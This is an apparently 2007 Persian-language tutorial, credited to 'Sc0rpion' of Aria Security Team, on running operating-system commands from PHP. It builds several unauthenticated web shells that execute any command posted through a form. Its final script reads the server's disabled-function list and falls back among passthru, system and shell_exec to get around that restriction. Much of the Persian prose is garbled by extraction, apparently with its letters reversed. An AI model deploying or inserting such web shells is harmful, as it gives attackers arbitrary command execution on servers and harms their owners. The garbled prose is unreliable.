execviaphp.pdf

About Global Documents

Global Documents provides you with documents from around the globe on a variety of topics for your enjoyment.
Global Documents utilizes edocr for all its document needs due to edocr's wonderful content features. Thousands of professionals and businesses around the globe publish marketing, sales, operations, customer service and financial documents making it easier for prospects and customers to find content.
command php echo br left echo execute form method POST input type submit method POST action POST action input System br left form
 ﮫﻋﻮﻤﺠﻣ
 :
 یدﺮﺑرﺎﮐ یﺎھ لﺎﺜﻣ
php
 عﻮﺿﻮﻣ
 :
execute your own commandz with php
ﺎﯾرآ ﯽﺘﯿﻨﻣا هوﺮﮔ
 تلاﺎﻘﻣ یﺮﺳ
PHP
 تلاﺎﻘﻣ یﺮﺳ رد
 PHP
فﺪھ ﻦﯾا 
 ﻊﺑاﻮﺗ ﺎﺑ ار ﺎﻤﺷ ﺎﺗ ﻢﯾراد ار 
PHP
ﻢﯾزﺎﺳ ﺎﻨﺷآ 
 .
 درﻮﻣ رد ﻪﻟﺎﻘﻣ ﻦﯾا
Execute
 تارﻮﺘﺳد ندﺮﮐ 
 زا هدﺎﻔﺘﺳا ﺎﺑ دﻮﺧ
 PHP
ﺪﺷﺎﺑ ﯽﻣ
2007
Sc0rpion
Aria Security Team
8/18/2007
 یدﺎﻋ ﺖﻟﺎﺣ رد ﺪﻧﺎﻤﮐ یاﺮﺟا یاﺮﺑ ﺖﭙﯾﺮﮑﺳا ﻦﯾا
 )
Safe mod off
 ( 
 ﺎﻣ ﻊﺑاﻮﺗ  ﮫﮐ ﯽﻃﺮﺷ ﮫﺑ ﺖﺴھ
disable
 ﺪﻨﺷﺎﺑ هﺪﺸﻧ 
 .
 بﻮﺧ
 غاﺮﺳ ﺎﺠﻨﯾا رد ﺎﻣ
3
ﻤھ زا نﻮﺷدﺮﺑرﺎﮐ ﮫﮐ ﻢﯾﺮﯿﻣ ﻊﺑﺎﺗ 
 هﺮﺘﺸﯿﺑ ﮫ
 !
 دﻮﺼﻘﻣ ﮫﺑ ور ﺎﻣ ﮫﮐ ﺪﻨﺘﺴھ ﻢھ ﺮﮕﯾد ﻊﺑاﻮﺗ ﺖﺴھ رﺎﮐ لﻮﺻا ﻦﯾا ﮫﺘﺒﻟا
 و ﺎھﺪﻨﻓﺮﺗ و ندﺮﮐ ﺲﭘ یﺎﺑ یاﺮﺑ ﮫﮕﯾد یﺎھ رﺎﮐ ﺎھار ﯽﻠﯿﺧ و ﻦﻧﻮﺳﺮﯿﻣ نﻮﻣدﻮﺧ
 ....
 زا ﮫﮐ
google
 ﺎﮭﻧوا یاﺮﺑ ﻊﺟﺮﻣ ﻦﯾﺮﺘﮭﺑ 
 ﮫﺷﺎﺑ ﮫﻧﻮﺘﯿﻣ
 .
 ﻢﯾﺪﯿﻨﺷ ور ﻂﻠﻏ رﺎﯿﺴﺑ ی ﮫﻠﻤﺟ ﺎﮭﺘﻗو ﯽﻠﯿﺧ
 :
 ﮫﺘﺴﺑ ور ﺪﻧﺎﻤﮐ روﺮﺳ
 !
 هراﺪﻧ ﯽﻋلاﻃا رﺎﺘﺧﺎﺳ زا دﺮﻓ ﮫﮐ دراد نآ زا ﺖﯾﺎﮑﺣ ﮫﻠﻤﺟ ﻦﯾا
ﺎﻓﺮﺻ
 "
 ﮫﺘﻓﺮﮔ دﺎﯾ یا ﮫﺸﯿﻠﮐ ور ﺐﻠﻄﻣ
 .
 بﻮﺧ
  :
Passthru() : Execute an external program and display raw output 
System() :  Execute an external program and display the output
Shell_Exec() : Execute command via shell and return the complete output as a string
 ﻊﺑﺎﺗ
system()
 . 
 ﻊﺑﺎﺗ ﯽﻠﮐ ﻞﮑﺷ
:
string system ( string $command [, int &$return_var] )
 هﺪﯿﻣ نﻮﺸﻧ ﻊﺑﺎﺗ ﮫﮐ ﺖﺴھ یراﺪﻘﻣ ﺶﯿﻣود ﺪﯾﺪﺑ ﺶﺑ ﺮﯿﻐﺘﻣ ﮏﯾ ﺎﺑ ﺪﯿﻧﻮﺘﯿﻣ ﺎﻤﺷ ور ﺶﯿﻟوا هراد ﺮﺘﻣارﺎﭘ ود بﻮﺧ
,
ا ﮫﮐ یﺪﻧﺎﻤﮐ ﺮﮔا 
 اﺮﺟ
 ﺪﯿﻨﮑﯿﻣ
true
 دﺪﻋ ﻢﻋ ﻊﺑﺎﺗ ﮫﻧودﺮﮔﺮﺑ ور 
0
 دﺪﻋ ﮫﻧﺮﮔو هﺪﯿﻣ نﻮﺸﻧ ور 
1
 ﺪﯿﻨﮐ ﮫﺟﻮﺗ هدﺎﺳ لﺎﺜﻣ ﮏﯾ ﮫﺑ نﺪﺷ ﻦﺷور یاﺮﺑ هﺪﯿﻣ نﻮﺸﻧ ور 
:
<?php
echo '<pre>';
$last_line = system('ls’, $retval);
echo '
</pre>
<hr />Last line of the output: ' . $last_line . '
<hr />Return value: ' . $retval;
?> 
 ﮫﺸﺑ اﺮﺟا ﺲﮐﻮﻨﯿﻟ روﺮﺳ ﮏﯾ یور ﺮﺑ ﺖﭙﯾﺮﮑﺳا ﺮﮔا
$retval
 راﺪﻘﻣ 
0
 یﺎﺠﺑ ﮫﮔا ﯽﻟو ﮫﻧودﺮﮕﯿﻣﺮﺑ ور 
ls
 زا لﺎﺜﻣ یاﺮﺑ 
net user
 
 راﺪﻘﻣ دراﺪﻧ دﻮﺟو ﺲﮐﻮﻨﯿﻟ رد یﺪﻧﺎﻤﮐ ﻦﯿﻨﭼ نﻮﭼ ﻢﯿﻨﮐ هدﺎﻔﺘﺳا
1
 ﮫﻧودﺮﮕﯿﻣﺮﺑ ور 
 .
 ﺪﻧﺎﻤﮐ ندﺮﮐ تﻮﯿﮐﺰﮔا ﮫﻤﮭﻣ ﺎﻣ یاﺮﺑ ﮫﮐ یﺰﯿﭼ ﮫﺘﺒﻟا
ﺴھ
 ﻢﯾراﺪﻧ ﻊﻗاﻮﻣ ﺮﺘﺸﯿﺑ رد مود ﺮﺘﻣارﺎﭘ ﮫﺑ یزﺎﯿﻧ و ﺖ
 !
 ﮏﯾ ﺪﯿﻧﻮﺘﯿﻣ ﺎﻤﺷ ترﻮﺻ ﻦﯾﺪﺑ
cmd
 ﺪﯿﺷﺎﺑ ﮫﺘﺷاد بو یور ﺮﺑ 
:
<?php
echo"<br><left><form method='POST' action=''>".
"<input size='30' name='command'>".
"<input type='submit' value='eXecutE !'><br>".
"</left></td></tr><PRE>";
$command = $_POST['command'];
System(“$command”);
?>
 ﻊﺑﺎﺗ
passthru()
 . 
 ﺪﻨﻧﺎﻣ
system()
 تﻮﯿﮐﺰﮔا ور نوا ﺖﺷاد دﻮﺟو ﺪﻧﺎﻤﮐ ﮫﮔا و ﮫﻧودﺮﮕﯿﻤﻧﺮﺑ ور یراﺪﻘﻣ ﮫﮐ توﺎﻔﺗ ﻦﯾا ﺎﺑ ﺖﺴھ 
 ﺪﻨﻧﺎﻣ لﺎﺜﻣ ﮫﻨﮑﯿﻣ
system() 
 : 
<?php
echo"<br><left><form method='POST' action=''>".
"<input size='30' name='command'>".
"<input type='submit' value='eXecutE !'><br>".
"</left></td></tr><PRE>";
$command = $_POST['command'];
passthru(“$command”);
?>
 ﻊﺑﺎﺗ بﻮﺧ
shell_exec()
 هراﺪﻧ ﯽﺻﺎﺧ هﺰﯿﭼ ﻢھ 
:
shell_exec ( string $cmd )
 هدﺎﺳ لﺎﺜﻣ ﮫﯾ
:
<?php
$output = shell_exec('ls -lart');
echo "<pre>$output</pre>";
?>
 ﻦﯾا ﮫﮐ ﮫﻨﯾا ﯽﻠﺒﻗ ﺎﺗود ﺎﺑ ﻊﺑﺎﺗ ﻦﯾا قﺮﻓ
output
 دﺮﮐ ﺖﯾاﺪھ ور ﯽﺟوﺮﺧ ﮫﺸﯿﻣ و ﮫﻧودﺮﮕﯿﻣﺮﺑ ور هﺪﺷ تﻮﯿﮐﺰﮔا ﺪﻧﺎﻤﮐ 
:
<body bgcolor="black" text="white" >
<?php
$bash=$_POST['shell'];
$current = shell_exec("cd");
$_show=shell_exec("$bash");
echo "<br><left><b>".'shell_exec()'."</left></b><br>";
        print "---------------------------------------------------------------------------\n";
        echo "<br><left><b>".'Base Dir :'." $current".'</b><br>';
        echo "<left><b>".'Last Command :'." $bash"."</left></b><br>";
        print "---------------------------------------------------------------------------\n<br>";
echo "<center>
<textarea rows=10 cols=80 >$_show</textarea><br>
<form method='POST' action=''>
<input type='text' size='30' name='shell' value=''>
<input type='submit' value='eXec'><br>";
?>
 ﻢﯿﻨﮑﯿﻣ ﺶﺘﻓﺮﺸﯿﭘ ﻢﮐ ﮫﯾ لاﺎﺣ بﻮﺧ
 !
 ﻢﯾرﻮﺨﯿﻣﺮﺑ رورا ﻦﯾا ﮫﺑ ﺎﮭﺘﻗو ﯽﻀﻌﺑ
:
Warning: passthru() has been disabled for security reasons in 
/home/pramodix/public_html/gallery/setup/check_netpbm.php on line 88
 ﻊﺑﺎﺗ ﮫﮐ ﺖﺴھ ﻦﯾا رورا ﻦﯾا ﯽﻨﻌﻣ بﻮﺧ
passthru()
 ﺖﺴﯿﻟ رد 
disable_function
 هراد راﺮﻗ ﺎھ 
 !
 ﻊﺑﺎﺗ ﻦﯾا زا هدﺎﻔﺘﺳا ﺎﺑ ﯽﻨﻌﯾ
 ﻢﯿﻨﮑﺑ یرﺎﮐ ﻢﯿﻧﻮﺘﯿﻤﻧ ﺎﻣ
!
 ﯽﺘﺴﯿﻧ رﻮﺒﺠﻣ ﺎﻣا ﯽﻨﮐ هدﺎﻔﺘﺳا ﮫﮕﯾد ﻊﺑﺎﺗ ﮏﯾ زا یرﻮﺒﺠﻣ ﺎﻤﺷ بﻮﺧ
3
 ﯽﻨﮐ دﻮﻠﭘآ ﻮﻧﻮﺸﯿﮑﯾ رﺎﺑ ﺮھ ﯽﺴﯾﻮﻨﺑ ﺖﭙﯾﺮﮑﺳا ﺎﺗ 
 !
 ﻢﯿھاﻮﺨﯿﻣ ﺎﻣ
 هﺪﺑ مﺎﺠﻧا ﺎﻣ یاﺮﺑ ورﺎﮐ ﻦﯾا ﮫﮐ ﻢﯾزﺎﺴﺑ ﻊﺑﺎﺗ ﮏﯾ

 زا ور هﺪﺷ لﺎﻌﻓ ﺮﯿﻏ ﻊﺑاﻮﺗ ﮫﮐ ﮫﻨﯾا ﺪﯿﻨﮑﺑ ﺪﯾﺎﺑ ﮫﮐ یرﺎﮐ ﻦﯿﻟوا
php.ini 
 زا لاﺎﺑ ﻊﺑﺎﺗ ﮫﺳ زا ﮏﯾ ﺮھ ندﻮﺒﻧ دﻮﺟﻮﻣ ترﻮﺻ رد ﺪﯾﺮﯿﮕﺑ 
و ﮫﺷ هدﺎﻔﺘﺳا ﺪﻧﺎﻤﮐ یاﺮﺟا یاﺮﺑ نآ
 ﮫﺷ لﺎﯿﺨﯿﺑ ور ﻊﺑﺎﺗ ﮫﻧﺮﮔ
 !
 ﻊﺑﺎﺗ زا بﻮﺧ
ini_get() 
 ﻢﯾﺮﯿﮕﯿﻣ ﮏﻤﮐ 
 .
 ﯽﻠﮐ ﻞﮑﺷ
:
ini_get ( string $varname )
 زا ور راﺪﻘﻣ ﮫﯾ ﺖﺴھ نﺎﺳآ ر ﺎﯿﺴﺑ ﻊﺑﺎﺗ ﻦﯾا ﺎﺑ رﺎﮐ بﻮﺧ
php.ini
 تﺎﻤﯿﻈﻨﺗ نﻮﻤھ ﮫﻧودﺮﮕﯿﻣﺮﺑ ﮫﮐ یراﺪﻘﻣ بﻮﺧ ﮫﻨﮑﯿﻣ ﮏﭼ تاﺮﺑ 
 ﺮﯾدﺎﻘﻣ یاﺮﺑ و ﻢﯾاﻮﺨﯿﻣ ﮫﮐ ﺖﺴھ ﺐﻄﺧ
 )
لﺎﻧ و ﯽﻟﺎﺧ
 ( 
 راﺪﻘﻣ
false
 ﮫﻧودﺮﮕﯿﻣﺮﺑ ور 
.
 ﻊﺑﺎﺗ ﻦﯾا زا هدﺎﺳ لﺎﺜﻣ ﮏﯾ
:
<?php
$log = ini_get('error_log'); 
printf ("%s",$log);
?>
 ﮫﻨﯾا ﻢﯿﻨﮑﯿﻣ ﮫﮐ یرﺎﮐ ﺎﻣ  بﻮﺧ
 :
$df = ini_get("disable_functions");
 زا ور هﺪﺷ لﺎﻌﻓ ﺮﯿﻏ ﻊﺑاﻮﺗ ﯽﻨﻌﯾ
php.ini
 ﻢﯾﺮﯿﮕﯿﻣ 
 .
ﻢﯿﻨﮐ ﮏﭼ ﮫﮐ ﮫﻨﯾا یﺪﻌﺑ رﺎﮐ
 نوا ﻢﯿﻨﯿﺒﺑ 
3
 رد لاﺎﺑ ﻊﺑﺎﺗ 
$df
 ﮫﻧ ﺎﯾ هراد دﻮﺟو 
 !
 ﻊﺑﺎﺗ زا رﺎﮐ ﻦﯾا یاﺮﺑ
substr_count()
 ﻢﯾﺮﯿﮕﯿﻣ ﮏﻤﮐ 
:
substr_count ( string $haystack, string $needle)
 لوا ﺮﺘﻣارﺎﭘ
string
 ﻢﯿﻨﮐ چﺮﺳ ور مود ﺮﺘﻣارﺎﭘ نوا ﻮﺗ ﻢﯿھاﻮﺨﯿﻣ ﮫﮐ ﺖﺴھ 
!
 ﮫﻨﯾا ﺐﻟﺎﺟ ی ﮫﺘﮑﻧ 
 :
Return Values
This functions returns an integer.
 ﻢﯾﺮﺒﯿﻣ ور مزلا هدﺎﻔﺘﺳا ﺎﻣ ﺎﻣا ﮫﻧودﺮﮕﯿﻣﺮﺑ ور یدﺪﻋ راﺪﻘﻣ ﻂﻘﻓ ﻊﺑﺎﺗ ﻦﯾا
 !
 ﻢﯿﻨﮐ ﺖﺳرد ور ﻊﺑﺎﺗ هﺪﯿﺳر نوا ﺖﻗو ﻢﻨﮐ ﺮﮑﻓ
 !
 لاﺎﺑ ﻊﺑاﻮﺗ ﮫﻨﯿﺒﺑ ﮫﻨﮑﯿﻣ ﮏﭼ ﻊﺑﺎﺗ هدﺎﺳ نﺎﺑز ﮫﺑ
 )
system ...
 ( 
 ﮫﻧ ﺎﺑ ﺪﻨﺘﺴھ لﺎﻌﻓ ﺮﯿﻏ
 ﮫﺑ عوﺮﺷ نوا زا هدﺎﻔﺘﺳا ﺎﺑ ﮫﻧ ﮫﮔا
 ﻢﯾﺪﯿﻣ ﺶﺑ ﺎﻣ ﮫﮐ ﮫﻨﮑﯿﻣ یﺪﻧﺎﻤﮐ تﻮﯿﮐﺰﮔا
 !
 ﮫﮔا
3
 راﺪﻘﻣ ﻊﺑﺎﺗ ﮫﺷﺎﺑ لﺎﻌﻓ ﺮﯿﻏ هﺪﺷ دﺎﯾ ﻊﺑﺎﺗ 
can’t 
be executed
 ﮫﻧودﺮﮕﯿﻣﺮﺑ ور 
:
<?php
$df = ini_get("disable_functions");
function execute($command){
global $df;
if (!substr_count($df, 'passthru')){
passthru($command);
}elseif (!substr_count($df, 'system')){
system($command);
}elseif (!substr_count($df, 'shell_exec')){
$shell = shell_exec($command);
echo "$shell";
}else{
echo "sorry , Can't be executed ";
}}
echo"<br><left><form method='POST' action=''>".
"<input size='30' name='command'>".
"<input type='submit' value='eXecutE !'><br>".
"</left></td></tr><PRE>";
$command = $_POST['command'];
if (!$command){}else{
execute("$command");
}
?>